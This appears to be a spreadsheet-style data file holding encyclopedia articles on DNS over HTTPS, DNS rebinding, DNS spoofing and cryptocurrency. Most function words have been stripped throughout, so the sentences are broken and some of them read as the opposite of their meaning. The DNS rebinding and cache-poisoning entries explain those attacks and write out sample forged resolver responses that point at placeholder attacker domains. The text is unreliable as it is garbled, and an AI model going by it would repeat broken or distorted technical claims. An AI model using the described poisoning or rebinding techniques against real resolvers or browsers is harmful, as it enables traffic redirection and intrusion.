    <t>https (doh) protocol performing remote domain name system (dns) resolution https protocol. goal method increase user privacy security preventing eavesdropping manipulation data man-in-the-middle attacks using https protocol encrypt data client doh-based resolver. march 2018, google mozilla foundation started testing versions https. february 2020, firefox switched https default users united states.an alternative (dot) protocol, similar standard encrypting queries, differing methods used encryption delivery. basis privacy security, whether superior protocol exists among matter controversial debate, others argue merits either depend specific case. technical details proposed standard, published 8484 (october 2018) ietf. uses http/2 https, supports wire format response data, returned existing responses, https payload mime type application/dns-message. http/2 used, server also http/2 server push send values anticipates client find useful advance.doh work progress. even though ietf published 8484 proposed standard companies experimenting ietf determine best implemented. ietf evaluating number approaches best deploy looking working group, adaptive discovery (add), work develop consensus. addition, industry working groups encrypted deployment initiative, formed "define adopt encryption technologies manner ensures continued high performance, resiliency, stability security internet's critical namespace name resolution services, well ensuring continued unimpaired functionality security protections, parental controls, services depend upon dns".since cannot used circumstances, like captive portals, browsers like firefox configured fallback insecure dns. oblivious dns-over-https oblivious internet draft proposing protocol extension ensure single server aware client's address message contents. oblivious originally developed oblivious (odns) researchers princeton university university chicago extension unencrypted dns, standardized widely deployed. apple cloudflare subsequently deployed technology context doh, oblivious (odoh).in odoh odns, requests responses routed proxy, hiding clients' addresses resolver. requests encrypted hide contents proxy, resolver decrypt request. thus, proxy knows client address request, resolver knows request client address, preventing client address linked query, unless servers collude. deployment scenarios used recursive resolution resolvers. resolvers (doh clients) must access server hosting query endpoint.three usage scenarios common: using implementation within application: some browsers built-in implementation thus perform queries bypassing operating system's functionality. drawback application inform user skips querying, either misconfiguration lack support doh. installing proxy name server local network: scenario client systems continue traditional (port 853) query name server local network, gather necessary replies reaching doh-servers internet. this method transparent user. installing proxy local system: scenario, operating systems configured query locally running proxy. contrast previously mentioned method, proxy needs installed system wishing doh, might require effort larger environments. software support operating systems apple apple's macos released late 2020 support protocols. windows november 2019, microsoft announced plans implement support encrypted protocols microsoft windows, beginning doh. 2020, microsoft released windows insider preview build 19628 included initial support along instructions enable registry command line interface. windows insider preview build 20185 added graphical user interface specifying resolver. support included windows 21h2.windows support. recursive resolvers bind bind open source resolver internet systems consortium added native support version 9.17.10. powerdns dnsdist, open source proxy/load balancer powerdns, added native support version 1.4.0 april 2019. unbound unbound, open source resolver created nlnet labs, supported since version 1.12.0, released october 2020. first implemented support encryption using alternative protocol much earlier, starting version 1.4.14, released december 2011. unbound runs operating systems, including distributions linux, macos, windows. browsers google chrome https available google chrome windows macos, configurable settings page. when enabled, operating system configured supported server, chrome upgrade queries encrypted. also possible manually specify preset custom server within user interface.in september 2020, google chrome android began staged rollout https. users configure custom resolver disable https settings.google chrome https providers preconfigured google public dns, cloudflare 1.1.1.1, quad 9.9.9.9, nextdns, cleanbrowsing. microsoft edge microsoft edge supports https, configurable settings page. when enabled, operating system configured supported server, edge upgrade queries encrypted. also possible manually specify preset custom server within user interface. mozilla firefox 2018, mozilla partnered cloudflare deliver firefox users enable (known trusted recursive resolver). february 2020, firefox started enabling https us-based users, relying cloudflare's resolver default. opera opera supports doh, configurable browser settings page. default, queries sent cloudflare servers. public servers https server implementations already available free charge public providers. implementation considerations many issues properly deploy still resolved internet community including, limited stopping third-parties analyzing traffic security purposes disruption dns-level parental controls content filters split enterprise networks localization analysis traffic security purposes impede analysis monitoring traffic cybersecurity purposes; 2019 ddos worm godlua used mask connections command-and-control server.in january 2021, warned enterprises using external resolvers prevent query filtering, inspection, audit. instead, recommends configuring enterprise-owned resolvers blocking known external resolvers. disruption content filters used bypass parental controls operate (unencrypted) standard level; circle, parental control router relies queries check domains blocklist, blocks default this. however, providers offer filtering parental controls along support operating servers.the internet service providers association (ispa)—a trade association representing british isps—and also british body internet watch foundation criticized mozilla, developer firefox browser, supporting doh, believe undermine blocking programs country, including default filtering adult content, mandatory court-ordered filtering copyright violations. ispa nominated mozilla "internet villain" award 2019 (alongside directive copyright digital single market, donald trump), "for proposed approach introduce dns-over-https bypass filtering obligations parental controls, undermining internet safety standards uk." mozilla responded allegations ispa, arguing would prevent filtering, "surprised disappointed industry association isps decided misrepresent improvement decades-old internet infrastructure". response criticism, ispa apologized withdrew nomination. mozilla subsequently stated used default british market discussion relevant stakeholders, stated "would offer real security benefits citizens". also dnscrypt dnscurve edns client subnet references external links privacy project: dnsprivacy.org https implementations cartoon intro https https (doh) considerations operator networks (draft, expired march 2020)</t>
  </si>
  <si>
    <t>DNS rebinding</t>
  </si>
  <si>
    <t>rebinding method manipulating resolution domain names commonly used form computer attack. attack, malicious page causes visitors client-side script attacks machines elsewhere network. theory, same-origin policy prevents happening: client-side scripts allowed access content host served script. comparing domain names essential part enforcing policy, rebinding circumvents protection abusing domain name system (dns). this attack used breach private network causing victim's browser access computers private addresses return results attacker. also employed victim machine spamming, distributed denial-of-service attacks, malicious activities. rebinding works attacker registers domain (such attacker.com) delegates server attacker's control. server configured respond short time live (ttl) record, preventing response cached. when victim browses malicious domain, attacker's server first responds address server hosting malicious client-side code. instance, could point victim's browser website contains malicious javascript flash scripts intended execute victim's computer. malicious client-side code makes additional accesses original domain name (such attacker.com). these permitted same-origin policy. however, victim's browser runs script makes request domain, attacker replies address. instance, could reply internal address address target somewhere else internet. protection following techniques attempt prevent rebinding attacks: servers chain filter private addresses loopback addresses: external public servers (e.g. opendns) implement filtering. local system administrators configure organization's local nameserver(s) block resolution external names internal addresses. (this downside allowing attacker internal address ranges use.) firewall (e.g. dnswall), gateway local filter replies pass discarding local addresses. browsers resist rebinding: browsers implement pinning: address locked value received first response. this technique block legitimate uses dynamic dns, work attacks. however, important fail-safe (stop rendering) address change, using address past expiration open opposite vulnerability address legitimately changed expired address controlled attacker. noscript extension firefox includes abe, firewall-like feature inside browser default configuration prevents attacks local network preventing external webpages accessing local addresses. servers reject http requests unrecognized host header. also hijacking spoofing references external links protecting browsers rebinding attacks (2007) hardening update adobe flash player (2008) security alert 200041 (2008-09-04) rebinding robert rsnake hansen (2009)</t>
  </si>
  <si>
    <t>DNS spoofing</t>
  </si>
  <si>
    <t>spoofing, also referred cache poisoning, form computer security hacking corrupt domain name system data introduced resolver's cache, causing name server return incorrect result record, e.g. address. this results traffic diverted attacker's computer computer). overview domain name system domain name system server translates human-readable domain name (such example.com) numerical address used route communications nodes. normally server know requested translation another server, process continues recursively. increase performance, server typically remember (cache) translations certain amount time. this means receives another request translation, reply without needing servers, cache expires. when server received false translation caches performance optimization, considered poisoned, supplies false data clients. server poisoned, return incorrect address, diverting traffic another computer (often attacker's). cache poisoning attacks normally, networked computer uses server provided internet service provider (isp) computer user's organization. servers used organization's network improve resolution response performance caching previously obtained query results. poisoning attacks single server affect users serviced directly compromised server serviced indirectly downstream server(s) applicable.to perform cache poisoning attack, attacker exploits flaws software. server correctly validate responses ensure authoritative source (for example using dnssec); otherwise server might caching incorrect entries locally serve users make request. this attack used redirect users website another site attacker's choosing. example, attacker spoofs address entries target website given server replaces address server control. attacker creates files server control names matching target server. these files usually contain malicious content, computer worms viruses. user whose computer referenced poisoned server gets tricked accepting content coming non-authentic server unknowingly downloads malicious content. this technique also used phishing attacks, fake version genuine website created gather personal details bank credit/debit card details. variants following variants, entries server ns.target.example would poisoned redirected attacker's name server address w.x.y.z. these attacks assume name server target.example ns.target.example.to accomplish attacks, attacker must force target server make request domain controlled attacker's nameservers. redirect target domain's name server first variant cache poisoning involves redirecting name server attacker's domain name server target domain, assigning name server address specified attacker. server's request: address records subdomain.attacker.example? subdomain.attacker.example. attacker's response: answer: response) authority section: attacker.example. 3600 ns.target.example. additional section: ns.target.example. w.x.y.z vulnerable server would cache additional a-record address) ns.target.example, allowing attacker resolve queries entire target.example domain. redirect record another target domain second variant cache poisoning involves redirecting nameserver another domain unrelated original request address specified attacker.dns server's request: address records subdomain.attacker.example? subdomain.attacker.example. attacker's response: answer: response) authority section: target.example. 3600 ns.attacker.example. additional section: ns.attacker.example. w.x.y.z vulnerable server would cache unrelated authority information target.example's ns-record (nameserver entry), allowing attacker resolve queries entire target.example domain. prevention mitigation many cache poisoning attacks servers prevented less trusting information passed servers, ignoring records passed back directly relevant query. example, versions bind 9.5.0-p1 perform checks. source port randomization requests, combined cryptographically secure random numbers selecting source port 16-bit cryptographic nonce, greatly reduce probability successful race attacks.however, routers, firewalls, proxies, gateway devices perform network address translation (nat), specifically, port address translation (pat), rewrite source ports order track connection state. when modifying source ports, devices remove source port randomness implemented nameservers stub resolvers.secure (dnssec) uses cryptographic digital signatures signed trusted public certificate determine authenticity data. dnssec counter cache poisoning attacks. 2010 dnssec implemented internet root zone servers., needs deployed level domain servers well. dnssec readiness shown list internet top-level domains. 2020, original tlds support dnssec, country code tlds large countries, many country code tlds still not. this kind attack mitigated transport layer application layer performing end-to-end validation connection established. common example transport layer security digital signatures. example, using https (the secure version http), users check whether server's digital certificate valid belongs website's expected owner. similarly, secure shell remote login program checks digital certificates endpoints known) proceeding session. applications download updates automatically, application embed copy signing certificate locally validate signature stored software update embedded certificate. also hijacking rebinding mausezahn pharming root name server kaminsky references</t>
  </si>
  <si>
    <t>Cryptocurrency</t>
  </si>
  <si>
    <t>cryptocurrency, crypto-currency, crypto digital currency designed work medium exchange computer network reliant central authority, government bank, uphold maintain it.individual coin ownership records stored digital ledger, computerized database using strong cryptography secure transaction records, control creation additional coins, verify transfer coin ownership. despite name, cryptocurrencies considered currencies traditional sense varying treatments applied them, including classification commodities, securities, well currencies, cryptocurrencies generally viewed distinct asset class practice. some crypto schemes validators maintain cryptocurrency. proof-of-stake model, owners tokens collateral. return, authority token proportion amount stake. generally, token stakers additional ownership token time network fees, newly minted tokens reward mechanisms.cryptocurrency exist physical form (like paper money) typically issued central authority. cryptocurrencies typically decentralized control opposed central bank digital currency (cbdc). when cryptocurrency minted created prior issuance issued single issuer, generally considered centralized. when implemented decentralized control, cryptocurrency works distributed ledger technology, typically blockchain, serves public financial transaction database. traditional asset classes like currencies, commodities, stocks, well macroeconomic factors, modest exposures cryptocurrency returns.the first decentralized cryptocurrency bitcoin, first released open-source software 2009. march 2022 9,000 cryptocurrencies marketplace, market capitalization exceeding billion. history 1983, american cryptographer david chaum conceived anonymous cryptographic electronic money called ecash. later, 1995, implemented digicash, early form cryptographic electronic payments. digicash required user software order withdraw notes bank designate specific encrypted keys sent recipient. this allowed digital currency untraceable issuing bank, government, third party. 1996, national security agency published paper entitled make mint: cryptography anonymous electronic cash, describing cryptocurrency system, first publishing mailing list later 1997, american review (vol. issue 4).in 1997 book, sovereign individual william rees-mogg james dale davidson, authors predict currency used information would using "mathematical algorithms physical existence", cryptocurrency community call book's claim "prophecy".in 1998, published description "b-money", characterized anonymous, distributed electronic cash system. shortly thereafter, nick szabo described gold. like bitcoin cryptocurrencies would follow gold (not confused later gold-based exchange, bitgold) described electronic currency system required users complete proof work function solutions cryptographically together published. 2009, first decentralized cryptocurrency, bitcoin, created presumably pseudonymous developer satoshi nakamoto. used sha-256, cryptographic hash function, proof-of-work scheme. april 2011, namecoin created attempt forming decentralized dns, would make internet censorship difficult. soon after, october 2011, litecoin released used scrypt hash function instead sha-256. another notable cryptocurrency, peercoin, used proof-of-work/proof-of-stake hybrid.on august 2014, announced treasury commissioned study cryptocurrencies, role, any, could play economy. study also report whether regulation considered. final report published 2018, issued consultation cryptoassets stablecoins january 2021.in june 2021, salvador became first country accept bitcoin legal tender, legislative assembly voted 62–22 pass bill submitted president nayib bukele classifying cryptocurrency such.in august 2021, cuba followed resolution recognize regulate cryptocurrencies bitcoin.in september 2021, government china, single largest market cryptocurrency, declared cryptocurrency transactions illegal, completing crackdown cryptocurrency previously banned operation intermediaries miners within china. formal definition according lansky, cryptocurrency system meets conditions: system require central authority; state maintained distributed consensus. system keeps overview cryptocurrency units ownership. system defines whether cryptocurrency units created. cryptocurrency units created, system defines circumstances origin determine ownership units. ownership cryptocurrency units proved exclusively cryptographically. system allows transactions performed ownership cryptographic units changed. transaction statement issued entity proving current ownership units. different instructions changing ownership cryptographic units simultaneously entered, system performs them.in march 2018, word cryptocurrency added merriam-webster dictionary. altcoins tokens, cryptocurrencies, types digital assets bitcoin collectively known alternative cryptocurrencies, typically shortened "altcoins" "alt coins", disparagingly known "shitcoins". paul vigna wall street journal also described altcoins "alternative versions bitcoin" given role model protocol altcoin designers. altcoins often underlying differences compared bitcoin. example, litecoin aims process block every minutes, rather bitcoin's minutes, allows litecoin confirm transactions faster bitcoin. another example ethereum, smart contract functionality allows decentralized applications blockchain. ethereum used blockchain 2020, according bloomberg news. 2016, largest "following" altcoin, according york times.significant rallies across altcoin markets often referred "altseason". stablecoins stablecoins altcoins designed maintain stable level purchasing power. notably, designs foolproof, number stable coins crashed lost peg, including 2022 crash terra, falling cents, affiliated token luna falling 99.9%. architecture decentralized cryptocurrency produced entire cryptocurrency system collectively, rate defined system created publicly stated. centralized banking economic systems federal reserve system, corporate boards governments control supply currency. case decentralized cryptocurrency, companies governments cannot produce units, provided backing firms, banks corporate entities hold asset value measured underlying technical system upon decentralized cryptocurrencies based created group individual known satoshi nakamoto.as 2018, 1,800 cryptocurrency specifications existed. within proof-of-work cryptocurrency system bitcoin, safety, integrity balance ledgers maintained community mutually distrustful parties referred miners. miners computers help validate timestamp transactions, adding ledger accordance particular timestamping scheme. proof-of-stake (pos) blockchain, transactions validated holders associated cryptocurrency, sometimes grouped together stake pools. most cryptocurrencies designed gradually decrease production currency, placing total amount currency ever circulation. compared ordinary currencies held financial institutions kept cash hand, cryptocurrencies difficult seizure enforcement. blockchain validity cryptocurrency's coins provided blockchain. blockchain continuously growing list records, called blocks, linked secured using cryptography. each block typically contains hash pointer link previous block, timestamp transaction data. design, blockchains inherently resistant modification data. open, distributed ledger record transactions parties efficiently verifiable permanent way". distributed ledger, blockchain typically managed peer-to-peer network collectively adhering protocol validating blocks. once recorded, data given block cannot altered retroactively without alteration subsequent blocks, requires collusion network majority. blockchains secure design example distributed computing system high byzantine fault tolerance. decentralized consensus therefore achieved blockchain. nodes world cryptocurrency, node computer connects cryptocurrency network. node supports cryptocurrency's network either; relaying transactions, validation hosting copy blockchain. terms relaying transactions network computer (node) copy blockchain cryptocurrency supports. when transaction made node creating transaction broadcasts details transaction using encryption nodes throughout node network transaction (and every transaction) known. node owners either volunteers, hosted organization body responsible developing cryptocurrency blockchain network technology, enticed host node receive rewards hosting node network. timestamping cryptocurrencies various timestamping schemes "prove" validity transactions added blockchain ledger without need trusted third party. first timestamping scheme invented proof-of-work scheme. widely used proof-of-work schemes based sha-256 scrypt.some hashing algorithms used proof-of-work include cryptonight, blake, sha-3, x11. another method called proof-of-stake scheme. proof-of-stake method securing cryptocurrency network achieving distributed consensus requesting users show ownership certain amount currency. different proof-of-work systems difficult hashing algorithms validate electronic transactions. scheme largely dependent coin, there's currently standard form some cryptocurrencies combined proof-of-work proof-of-stake scheme. mining cryptocurrency networks, mining validation transactions. effort, successful miners obtain cryptocurrency reward. reward decreases transaction fees creating complementary incentive contribute processing power network. rate generating hashes, validate transaction, increased specialized machines fpgas asics running complex hashing algorithms like sha-256 scrypt. this arms race cheaper-yet-efficient machines existed since bitcoin introduced 2009.with people venturing world virtual currency, generating hashes validation become complex time, forcing miners invest increasingly large sums money improve computing performance. consequently, reward finding hash diminished often justify investment equipment cooling facilities mitigate heat equipment produces), electricity required them. popular regions mining include inexpensive electricity, cold climate, jurisdictions clear conducive regulations. july 2019, bitcoin's electricity consumption estimated approximately gigawatts, around 0.2% global total, equivalent energy consumed nationally switzerland.some miners pool resources, sharing processing power network split reward equally, according amount work contributed probability finding block. "share" awarded members mining pool present valid partial proof-of-work. february 2018, chinese government halted trading virtual currency, banned initial coin offerings shut mining. many chinese miners since relocated canada texas. company operating data centers mining operations canadian field sites, prices. june 2018, hydro quebec proposed provincial government allocate megawatts power crypto companies mining. according february 2018 report fortune, iceland become cryptocurrency miners part cheap electricity.in march 2018, city plattsburgh upstate york 18-month moratorium cryptocurrency mining effort preserve natural resources "character direction" city. february 2022, kazakhstan became second-biggest crypto-currency mining country, producing 18.1% global hash rate. country built compound containing 50,000 computers near ekibastuz. price rise increase cryptocurrency mining increased demand graphics cards (gpu) 2017. computing power gpus makes well-suited generating hashes. popular favorites cryptocurrency miners nvidia's 1060 1070 graphics cards, well amd's gpus, doubled tripled price stock. 1070 released price $450 sold much $1,100. another popular card, 1060 model) released msrp $250, sold almost $500. cards stock almost year. miners regularly entire stock gpu's soon available.nvidia asked retailers comes selling gpus gamers instead miners. boris böhles, manager nvidia german region, said: "gamers come first nvidia." wallets cryptocurrency wallet stores public private "keys" (address) seed used receive spend cryptocurrency. with private key, possible write public ledger, effectively spending associated cryptocurrency. with public key, possible others send currency wallet. there exist multiple methods storing keys seed wallet. these methods range using paper wallets (which public, private seed keys written paper), using hardware wallets (which hardware store wallet information), digital wallet (which computer software hosting wallet information), hosting wallet using exchange cryptocurrency traded, storing wallet information digital medium plaintext. anonymity bitcoin pseudonymous rather anonymous cryptocurrency within wallet tied people, rather specific keys "addresses"). thereby, bitcoin owners identifiable, transactions publicly available blockchain. still, cryptocurrency exchanges often required collect personal information users.additions monero, zerocoin, zerocash cryptonote suggested, would allow additional anonymity fungibility. economics cryptocurrencies used primarily outside existing banking governmental institutions exchanged internet. block rewards proof-of-work cryptocurrencies, bitcoin, offer block rewards incentives miners. there implicit belief whether miners paid block rewards transaction fees affect security blockchain, study suggests case certain circumstances.the rewards paid miners increase supply cryptocurrency. making sure verifying transactions costly business, integrity network preserved long benevolent nodes control majority computing power. verification algorithm requires processing power, thus electricity order make verification costly enough accurately validate public blockchain. miners factor costs associated expensive equipment necessary stand chance solving hash problem, must consider significant amount electrical power search solution. generally, block rewards outweigh electricity equipment costs, always case.the current value, long-term value, cryptocurrency supports reward scheme incentivize miners engage costly mining activities some sources claim current bitcoin design inefficient, generating welfare loss 1.4% relative efficient cash system. main source inefficiency large mining cost, estimated us$360 million year. this translates users willing accept cash system inflation rate 230% better using bitcoin means payment. however, efficiency bitcoin system significantly improved optimizing rate coin creation minimizing transaction fees. another potential improvement eliminate inefficient mining activities changing consensus protocol altogether. transaction fees transaction fees cryptocurrency depend mainly supply network capacity time, versus demand currency holder faster transaction. currency holder choose specific transaction fee, network entities process transactions order highest offered lowest. cryptocurrency exchanges simplify process currency holders offering priority alternatives thereby determine likely cause transaction processed requested time.for ether, transaction fees differ computational complexity, bandwidth use, storage needs, bitcoin transaction fees differ transaction size whether transaction uses segwit. september 2018, median transaction ether corresponded $0.017, bitcoin corresponded $0.55.some cryptocurrencies transaction fees, instead rely client-side proof-of-work transaction prioritization anti-spam mechanism. exchanges cryptocurrency exchanges allow customers trade cryptocurrencies assets, conventional fiat money, trade different digital currencies. crypto marketplaces guarantee investor completing purchase trade optimal price. result, many investors take advantage using arbitrage find difference price across several markets. atomic swaps atomic swaps mechanism cryptocurrency exchanged directly another cryptocurrency, without need trusted third party exchange. atms jordan kelley, founder robocoin, launched first bitcoin united states february 2014. kiosk installed austin, texas, similar bank atms scanners read government-issued identification driver's license passport confirm users' identities. initial coin offerings initial coin offering (ico) controversial means raising funds cryptocurrency venture. used startups intention avoiding regulation. however, securities regulators many jurisdictions, including u.s., canada, indicated coin token "investment contract" (e.g., howey test, i.e., investment money reasonable expectation profit based significantly entrepreneurial managerial efforts others), security subject securities regulation. campaign, percentage cryptocurrency (usually form "tokens") sold early backers project exchange legal tender cryptocurrencies, often bitcoin ether.according pricewaterhousecoopers, four biggest proposed initial coin offerings used switzerland base, frequently registered non-profit foundations. swiss regulatory agency finma stated would take "balanced approach" projects would allow "legitimate innovators navigate regulatory landscape launch projects consistent national laws protecting investors integrity financial system." response numerous requests industry representatives, legislative working group began issue legal guidelines 2018, intended remove uncertainty cryptocurrency offerings establish sustainable business practices. price trends "market cap" coin calculated multiplying price number coins circulation. total cryptocurrency market historically dominated bitcoin accounting least market value altcoins increased decreased market value relation bitcoin. bitcoin's value largely determined speculation among technological limiting factors known block chain rewards coded architecture technology bitcoin itself. cryptocurrency market follows trend known "halving", block rewards received bitcoin halved technological mandated limited factors instilled bitcoin turn limits supply bitcoin. date reaches near halving (twice thus historically) cryptocurrency market increases, followed downtrend.by mid-june 2021 cryptocurrency admittedly extremely volatile asset class portfolio diversification begun offered wealth managers 401(k)s. volatility cryptocurrency prices volatile compared established financial assets company stocks. week 2022, bitcoin lost cent value ethereum lost cent, solana cardano lost cent respectively. falls attributed warnings inflation. week, nasdaq tech stock index fell cent ftse cent down.in longer term, leading cryptocurrencies identified total value coins circulation january 2018, four (bitcoin, ethereum, cardano ripple (xrp)) still position early 2022. databases there also centralized databases outside blockchain store crypto market data. difference databases blockchain database controlled administrator, blockchain decentralized. administrator manages data controls public view compared blockchain, databases perform fast verification process. four popular cryptocurrency market databases coinmarketcap, coingecko, bravenewcoin cryptocompare. social trends according alan feuer york times, libertarians anarcho-capitalists attracted philosophical idea behind bitcoin. early bitcoin supporter roger said: first, almost everyone involved philosophical reasons. bitcoin great idea, separate money state." economist paul krugman argues cryptocurrencies like bitcoin "something cult" based "paranoid fantasies" government power.nigel dodd argues social life bitcoin essence bitcoin ideology remove money social governmental control. dodd discusses "declaration bitcoin's independence" message crypto-anarchism words: "bitcoin inherently anti-establishment, anti-system, anti-state. bitcoin undermines governments disrupts institutions bitcoin fundamentally humanitarian."david golumbia says ideas influencing bitcoin advocates emerge right-wing extremist movements liberty lobby john birch society anti-central bank rhetoric, recently, paul party-style libertarianism. steve bannon, owns "good stake" bitcoin, sees cryptocurrency form disruptive populism, taking control back central authorities.bitcoin's founder, satoshi nakamoto supported idea cryptocurrencies well libertarianism: "it's attractive libertarian viewpoint explain properly." nakamoto said 2008.according european central bank, decentralization money offered bitcoin theoretical roots austrian school economics, especially friedrich hayek book denationalisation money: argument refined, hayek advocates complete free market production, distribution management money monopoly central banks. increasing regulation rise popularity cryptocurrencies adoption financial institutions governments assess whether regulation needed protect users. financial action task force (fatf) defined cryptocurrency-related services "virtual asset service providers" (vasps) recommended regulated money laundering (aml) know customer (kyc) requirements financial institutions.in 2020, joint working group intervasp messaging standards published "ivms 101", universal common language communication required originator beneficiary information vasps. fatf financial regulators informed data model developed.in june 2020, fatf updated guidance include "travel rule" cryptocurrencies, measure mandates vasps obtain, hold, exchange information originators beneficiaries virtual asset transfers. subsequent standardized protocol specifications recommended using json relaying data vasps identity services. december 2020, ivms data model finalized ratified three global standard setting bodies created it.the european commission published digital finance strategy september 2020. this included draft regulation markets crypto-assets (mica), aimed provide comprehensive regulatory framework digital assets eu.on june 2021, basel committee banking supervision proposed banks held cryptocurrency assets must aside capital cover potential losses. instance, bank hold bitcoin worth billion, would required aside enough capital cover entire billion. this extreme standard banks usually held comes assets. however, proposal regulation. seeking co-ordinated, consistent comprehensive approach supervising cryptocurrencies. tobias adrian, imf's financial counsellor head monetary capital markets department said january 2022 interview "agreeing global regulations never quick. start now, achieve goal maintaining financial stability also enjoying benefits underlying technological innovations bring," united states 2021, states passed laws resolutions concerning cryptocurrency regulation. u.s. securities exchange commission (sec) considering steps take. july 2021, senator elizabeth warren, part senate banking committee, wrote chairman demanded provide answers cryptocurrency regulation july 2021, increase cryptocurrency exchange danger poses consumers. february 2022, justice department named young choi first director national cryptocurrency enforcement team identification dealing misuse cryptocurrencies digital assets. china september 2017, china banned icos cause abnormal return cryptocurrency decreasing announcement window. liquidity changes banning icos china temporarily negative liquidity effect became positive news.on 2021, china banned financial institutions payment companies able provide cryptocurrency transaction related services. this sharp fall price biggest proof work cryptocurrencies. instance, bitcoin fell 31%, ethereum fell 44%, binance coin fell dogecoin fell 30%. proof work mining next focus, regulators popular mining regions citing electricity generated highly polluting sources coal create bitcoin ethereum.in september 2021, chinese government declared cryptocurrency transactions kind illegal, completing crackdown cryptocurrency. united kingdom united kingdom, january 2021, cryptocurrency firms, exchanges, advisors professionals either presence, market product provide services within market must register financial conduct authority. additionally, june 2021, financial watchdog demanded binance, world's largest cryptocurrency exchange, cease regulated activities south africa south africa, seen large amount scams related cryptocurrency said putting regulatory timeline place, produce regulatory framework. largest scam occurred april 2021, founders african-based cryptocurrency exchange called africrypt, raees cajee ameer cajee, disappeared $3.8 billion worth bitcoin. additionally, mirror trading international disappeared $170 million worth cryptocurrency january 2021. south korea march 2021, south korea implemented legislation strengthen oversight digital assets. this legislation requires digital asset managers, providers exchanges registered korea financial intelligence unit order operate south korea. registering unit requires exchanges certified information security management system ensure customers real name bank accounts. also requires board members exchanges convicted crimes exchange holds sufficient levels deposit insurance cover losses arising hacks. turkey turkey's central bank, central bank republic turkey, banned cryptocurrencies crypto assets making purchases april 2021, ground cryptocurrencies payments poses significant transaction risks. salvador june 2021, salvador announced adopt bitcoin legal tender, first country india present, india neither prohibits allows investment cryptocurrency market. 2020, supreme court india lifted cryptocurrency, imposed reserve bank india. since investment cryptocurrency considered legitimate though still ambiguity issues regarding extent payment income accrued thereupon also regulatory regime. contemplated indian parliament soon pass specific either regulate cryptocurrency market india. expressing public policy opinion indian cryptocurrency market well-known online publication, leading public policy lawyer vice president saarclaw (south asian association regional co-operation law) hemant batra said "cryptocurrency market become involvement billions dollars market hence, unattainable irreconcilable government completely sorts cryptocurrency trading investment". mooted regulating cryptocurrency market rather completely banning favoured following fatf guidelines regard. legality legal status cryptocurrencies varies substantially country country still undefined changing many them. least study shown broad generalizations bitcoin illicit finance significantly overstated blockchain analysis effective crime fighting intelligence gathering tool. while countries explicitly allowed trade, others banned restricted according library congress 2018, "absolute ban" trading using cryptocurrencies applies eight countries: algeria, bolivia, egypt, iraq, morocco, nepal, pakistan, united arab emirates. "implicit ban" applies another countries, include bahrain, bangladesh, china, colombia, dominican republic, indonesia, iran, kuwait, lesotho, lithuania, macau, oman, qatar, saudi arabia taiwan. united states canada, state provincial securities regulators, coordinated north american securities administrators association, investigating "bitcoin scams" icos jurisdictions.various government agencies, departments, courts classified bitcoin differently. china central bank banned handling bitcoins financial institutions china early 2014. russia, though owning cryptocurrency legal, residents allowed purchase goods residents using russian ruble nonresidents allowed foreign currency. regulations bans apply bitcoin probably extend similar cryptocurrency systems.in august 2018, bank thailand announced plans create cryptocurrency, central bank digital currency (cbdc). advertising bans cryptocurrency advertisements temporarily banned google, twitter, bing, snapchat, linkedin mailchimp. chinese internet platforms baidu, tencent, weibo also prohibited bitcoin advertisements. japanese platform line russian platform yandex similar prohibitions. u.s. status march 2014, united states internal revenue service (irs) ruled bitcoin treated property purposes. therefore, virtual currencies considered commodities subject capital gains tax. legal concern unregulated global economy popularity demand online currencies increased since inception bitcoin 2009, concerns unregulated person person global economy cryptocurrencies offer become threat society. concerns abound altcoins become tools anonymous criminals.cryptocurrency networks display lack regulation criticized enabling criminals seek evade taxes launder money. money laundering issues also present regular bank transfers, however bank-to-bank wire transfers instance, account holder must least provide proven identity. transactions occur exchange altcoins independent formal banking systems, therefore make evasion simpler individuals. since charting taxable income based upon recipient reports revenue service, becomes extremely difficult account transactions made using existing cryptocurrencies, mode exchange complex difficult track.systems anonymity cryptocurrencies offer also serve simpler means launder money. rather laundering money intricate financial actors offshore bank accounts, laundering money altcoins achieved anonymous transactions.cryptocurrency makes legal enforcement extremist groups complicated, consequently strengthens them. white supremacist richard spencer went declare bitcoin “currency alt-right.” loss, theft, fraud february 2014, world's largest bitcoin exchange, gox, declared bankruptcy. likely theft, company claimed lost nearly 750,000 bitcoins belonging clients. this added approximately bitcoins existence, worth total $473 million. blamed hackers, exploited transaction malleability problems network. price bitcoin fell high $1,160 december $400 february.on november 2017, tether announced hacked, losing million usdt core treasury wallet.on december 2017, slovenian cryptocurrency exchange nicehash reported hackers stolen $70m using hijacked company computer.on december 2017, yapian, owner south korean exchange youbit, filed bankruptcy suffering hacks year. customers still granted access assets. 2018, bitcoin gold transactions hijacked abused unknown hackers. exchanges lost estimated $18m bitcoin gold delisted bittrex refused share damages. september 2018, homero josh garza sentenced months imprisonment, followed three years supervised release. garza founded cryptocurrency startups miners zenminer 2014, acknowledged plea agreement companies part pyramid scheme, pleaded guilty wire fraud 2015. u.s. securities exchange commission separately brought civil enforcement action garza, eventually ordered judgment $9.1 million plus $700,000 interest. sec's complaint stated garza, companies, fraudulently sold "investment contracts representing shares profits claimed would generated" mining.in january 2018, japanese exchange coincheck reported hackers stolen $530m worth cryptocurrencies.in june 2018, south korean exchange coinrail hacked, losing $37m worth cryptos. hack worsened already ongoing cryptocurrency selloff additional billion.on july 2018 exchange bancor, whose code fundraising subjects controversy, $23.5 million cryptocurrency stolen.a 2020 report found users lost crypto-assets worth hundreds millions dollars security breaches exchanges storage providers. between 2011 2019, reported breaches ranged four twelve year. 2019, billion dollars worth crypto assets reported stolen. stolen assets "typically find illegal markets used fund criminal activity".according 2020 report produced united states attorney general's cyber-digital task force, following three categories make majority illicit cryptocurrency uses: "(1) financial transactions associated commission crimes; money laundering shielding legitimate activity tax, reporting, legal requirements; crimes, theft, directly implicating cryptocurrency marketplace itself." report concludes "for cryptocurrency realize truly transformative potential, imperative risks addressed" "the government legal regulatory tools available disposal confront threats posed cryptocurrency's illicit uses".according 2020 national risk assessment—a comprehensive assessment money laundering terrorist financing risk uk—the risk using cryptoassets bitcoin money laundering terrorism financing assessed "medium" (from "low" previous 2017 report). legal scholars suggested money laundering opportunities perceived real. blockchain analysis company chainalysis concluded illicit activities like cybercrime, money laundering terrorism financing made 0.15% crypto transactions conducted 2021, representing total billion.in december 2021, monkey kingdom project based hong kong lost us$1.3 million worth cryptocurrencies phishing link used hacker. money laundering according blockchain data company chainanalysis, criminals laundered $8.6bn worth cryptocurrency 2021, previous year. data suggests rather managing numerous illicit havens, cybercriminals make small group purpose built centralized exchanges sending receiving illicit cryptocurrency. 2021, exchanges received funds sent crime linked addresses. almost $2.2bn worth cryptocurrencies embezzled defi protocols 2021, represents cryptocurrency theft 2021. according 